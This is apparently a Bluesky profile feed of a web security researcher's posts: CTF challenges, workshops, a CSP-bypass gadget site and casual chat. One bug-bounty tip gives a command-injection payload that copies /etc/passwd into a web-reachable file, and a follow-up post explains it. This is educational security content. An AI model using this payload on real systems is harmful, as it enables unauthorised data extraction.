Posts by Adam Langley

Haha, love the fact we got to see your whole thought process haha, nice work :)

1 year ago 1 0 0 0

Secure Coding Challenge…

What is insecure about this code? And how would you extract a file? For example /etc/passwd

1 year ago 0 0 2 0

If it doesn't work, it's always DNS you know. I created a challenge around this nightmare that will be kindly hosted by @hackinghub.bsky.social starting today at 18:00 UTC. Thanks @buildhacksecure.bsky.social for the kind hospitality.

1 year ago 1 1 0 0

So say we have the webroot:

/var/www/you-cant-guess/

And a file located here: /var/www/you-cant-guess/assets/uniquefile.png

The above command becomes:

cat /etc/passwd > /var/www/you-cant-guess/assets/uniquefile.png.txt

1 year ago 0 0 0 0

Got an RCE in a background process with no outbound network so you need to exfil to webroot without knowing the location?

All you need to know is a unique filename in the webroot.

$( cat /etc/passwd > $(find / -name uniquefile.png 2>/dev/null).txt )

#bugbountytips #hacking

1 year ago 2 0 1 0

Merry Christmas!

1 year ago 1 0 0 0

I don't know how I feel about AI. As a dev for 20+ yrs, I love coding, creating, solving puzzles. AI saves time & makes sense for business, but is it sucking the joy out of it? Are we all just becoming prompt engineers? Maybe I'm just an old man shouting at clouds...

1 year ago 0 0 0 0

Thank you mate, I try :)

1 year ago 0 0 0 0

Adam has the rare ability to turn seemingly simple situations into opportunities for reflection or learning.

1 year ago 1 1 1 0

I once did one side of a cube, that's the furthest I've got haha

1 year ago 1 0 0 0

Okay, I have a toxic CTF challenge idea.... Should I do it? Operation "Merry ToxMas"

1 year ago 2 0 1 0

2 Hours in and weirdly not tired. Just covered our SQL Injection module.

1 year ago 0 0 0 0

Hosting a workshop with @nahamsec.bsky.social remotely in Aus from 10pm to 1:30am for YowConf! Come on coffee!!!

1 year ago 1 1 0 1

👋

1 year ago 0 0 0 0

Oh yeah, totally all downhill from here.

1 year ago 0 0 1 0

Ah Happy Birthday dude, welcome to the 40 club!

1 year ago 1 0 1 0

Yeah I totally agree, it feels so much calmer here.

1 year ago 0 0 1 0

Ah nice, you too buddy :)

1 year ago 0 0 0 0

Hey BlueSky!

In case you missed it:

I've created cspbypass.com
A site where you can search for known CSP bypass gadgets to gain XSS.

It already contains a bunch of useful gadgets with contributions from your favourite hackers.

If you have some CSP bypasses to share, feel free to contribute!

1 year ago 71 24 1 1

I'm delivering a talk about web app security (or the lack of it) in web apps and also delivering a workshop in Melbourne, Brisbane and Sydney at the start of December! See yowcon.com for more detail.

1 year ago 4 0 0 0

Can't work out whether you're giving a talk or belting out a song :)

1 year ago 1 0 0 0

Hoping I prefer this platform a little more :) Give us a follow if you're into web app security or web development #webdev #hacking #ethicalhacker #php

1 year ago 7 2 0 0